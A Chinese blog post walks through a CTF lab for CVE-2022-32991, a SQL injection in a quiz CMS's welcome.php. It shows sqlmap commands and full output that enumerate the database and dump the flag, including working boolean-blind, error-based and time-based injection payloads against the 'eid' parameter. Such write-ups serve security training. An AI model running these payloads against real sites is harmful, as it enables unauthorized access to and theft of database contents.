首页 > 其他分享 >春秋云镜 - CVE-2022-32991

春秋云镜 - CVE-2022-32991

时间:2023-09-21 09:46:10浏览次数:79  
标签:INFO sqlmap 32991 18 09 云镜 flag MySQL CVE

靶标介绍:
该CMS的welcome.php中存在SQL注入攻击。

访问页面,先注册,使用邮箱加密码登录。

image-20230921091101203

bp抓包,后台挂上sqlipy然后去测welcome.php,常用的语句都没成功但过一会就有了结果,注入点在eid这个参数,看payload是bool盲注。

image-20230921092246074

直接sqlmap一把梭,脱裤。

sqlmap -r sql.txt --dbs --batch

image-20230921091623444

剩下的就简单了:

root@Lockly temp/tmp » sqlmap -r sql.txt -D ctf --tables --batch
...
[09:17:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:17:02] [INFO] fetching tables for database: 'ctf'
[09:17:02] [WARNING] reflective value(s) found and filtering out
[09:17:02] [INFO] retrieved: 'user'
[09:17:02] [INFO] retrieved: 'options'
[09:17:02] [INFO] retrieved: 'quiz'
[09:17:03] [INFO] retrieved: 'admin'
[09:17:03] [INFO] retrieved: 'questions'
[09:17:03] [INFO] retrieved: 'history'
[09:17:03] [INFO] retrieved: 'rank'
[09:17:03] [INFO] retrieved: 'flag'
[09:17:03] [INFO] retrieved: 'answer'
Database: ctf
[9 tables]
+-----------+
| admin     |
| history   |
| options   |
| rank      |
| user      |
| answer    |
| flag      |
| questions |
| quiz      |
+-----------+


root@Lockly temp/tmp » sqlmap -r sql.txt -D ctf -T flag --columns --batch
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.9#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:18:02 /2023-09-21/

[09:18:02] [INFO] parsing HTTP request from 'sql.txt'
[09:18:03] [INFO] resuming back-end DBMS 'mysql' 
[09:18:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: q=quiz&step=2&eid=-8440' OR 5703=5703#&n=1&t=34

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 3817 FROM(SELECT COUNT(*),CONCAT(0x7176627871,(SELECT (ELT(3817=3817,1))),0x71706a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- trpQ&n=1&t=34

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 1411 FROM (SELECT(SLEEP(5)))hVOO)-- gdHD&n=1&t=34
---
[09:18:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:18:03] [INFO] fetching columns for table 'flag' in database 'ctf'
[09:18:03] [WARNING] reflective value(s) found and filtering out
[09:18:03] [INFO] retrieved: 'flag'
[09:18:04] [INFO] retrieved: 'varchar(1024)'
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| flag   | varchar(1024) |
+--------+---------------+

[09:18:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zei2boyfnmt1xivgitc.cloudeci1.ichunqiu.com'

[*] ending @ 09:18:04 /2023-09-21/

root@Lockly temp/tmp » sqlmap -r sql.txt -D ctf -T flag -C flag --dump --batch
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.9#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:18:48 /2023-09-21/

[09:18:48] [INFO] parsing HTTP request from 'sql.txt'
[09:18:48] [INFO] resuming back-end DBMS 'mysql' 
[09:18:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: q=quiz&step=2&eid=-8440' OR 5703=5703#&n=1&t=34

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 3817 FROM(SELECT COUNT(*),CONCAT(0x7176627871,(SELECT (ELT(3817=3817,1))),0x71706a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- trpQ&n=1&t=34

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 1411 FROM (SELECT(SLEEP(5)))hVOO)-- gdHD&n=1&t=34
---
[09:18:48] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:18:48] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
[09:18:49] [WARNING] reflective value(s) found and filtering out
[09:18:49] [INFO] retrieved: 'flag{dca0ffb4-d243-4ebc-b6da-68da58943fd5}'
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{dca0ffb4-d243-4ebc-b6da-68da58943fd5} |
+--------------------------------------------+

[09:18:49] [INFO] table 'ctf.flag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zei2boyfnmt1xivgitc.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[09:18:49] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zei2boyfnmt1xivgitc.cloudeci1.ichunqiu.com'

[*] ending @ 09:18:49 /2023-09-21/

root@Lockly temp/tmp » 

标签:INFO,sqlmap,32991,18,09,云镜,flag,MySQL,CVE
From: https://www.cnblogs.com/bktown/p/17719140.html

相关文章

  • Redis漏洞总结--未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022
    Redis未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)环境复现采用Vulfocus靶场进行环境复现,官网docker搭建有问题,具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败CNVD-2015-07557未授权访问影响版本Redis<=5.0.5漏洞探测使用端......
  • Spring Framework RCE CVE-2022-22965 漏洞分析
    摘要本文会从几个角度分析漏洞CVE-2022-22965,首先会从payload的构造。每次我都喜欢先分析漏洞的payload,不得不承认实力没达到可以直接分析漏洞地步。所以会先看看payload的构造过程看看,每次学习和分析漏洞的payload能学到很多有趣的角度和想法。从payload的构造分析,分析payload的......
  • 【漏洞复现】Openfire身份认证绕过漏洞到RCE(CVE-2023-32315)
    1、简介Openfire是一个基于XMPP协议的即时通讯服务器,也称之为即时通讯平台。在即时通讯中往往因为需要保存一些状态或者数据所以不能采用点对点通讯,而是需要搭建服务器来转发。Openfire的管理页面包含5个菜单选项,分别是服务器基本信息配置选项、用户组管理选项、会话管理选项、分......
  • 【漏洞复现】JumpServer未授权访问漏洞(CVE-2023-42442)
    1、简介JumpServer是一款符合4A规范的开源堡垒机,帮助企业以更安全的方式管控和登录各种类型的资产,实现事前授权、事中监察、事后审计,满足等保合规要求。2、漏洞描述JumpServer在3.0.0-3.6.3版本存在未授权访问漏洞。由于系统权限配置存在不合理,导致未授权攻击者可以直接访问......
  • Drupal < 7.32版本 _“Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
    目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证说明内容漏洞编号CVE-2014-3704漏洞名称Drupal“Drupalgeddon”SQL注入漏洞漏洞评级影响范围Drupal7.0~7.31版本漏洞描述修复方案1.1、漏洞......
  • Django_debug page_XSS漏洞(CVE-2017-12794)漏洞复现
    目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞分析3、漏洞验证说明内容漏洞编号CVE-2017-12794漏洞名称Django_debugpage_XSS漏洞漏洞评级影响范围1.11.5版本漏洞描述修复方案1.1、漏洞描述1.11.5版本,修复了......
  • 浅谈Apache Shiro CVE-2023-22602
    一、漏洞描述  ApacheShiro是一个可执行身份验证、授权、加密和会话管理的Java安全框架。  由于1.11.0及之前版本的Shiro只兼容Spring的ant-style路径匹配模式(patternmatching),且2.6及之后版本的SpringBoot将SpringMVC处理请求的路径匹配模式从AntPathMat......
  • Tomcat_PUT方法任意写文件(CVE-2017-12615)
    目录Tomcat_PUT方法任意写文件(CVE-2017-12615)1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证工具扫描验证POC1.6、修复建议Tomcat_PUT方法任意写文件(CVE-2017-12615)说明内容漏洞编号CVE-2017-12615漏洞名称Tomcat_P......
  • Apache HTTPD-换行解析漏洞(CVE-2017-15715)
    目录ApacheHTTPD-换行解析漏洞(CVE-2017-15715)1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证1.5、深度利用GetShell1.6、修复建议ApacheHTTPD-换行解析漏洞(CVE-2017-15715)说明内容漏洞编号CVE-2017-15715漏洞名称Apac......
  • OpenSSH 用户枚举漏洞(CVE-2018-15473)【原理扫描】
    最烦做等保了!!!! 有没有同感的? 修复过程记录一下,为什么要记录呢,等保漏洞每次都是那些,我一直没有进行文档记录,导致我每次都要百度搜索解决。查看当前服务器openssh的版本#当前系统版本cat/etc/redhat-releaseCentOSLinuxrelease7.9.2009(Core)ssh-vOpenSSH_7.4p1......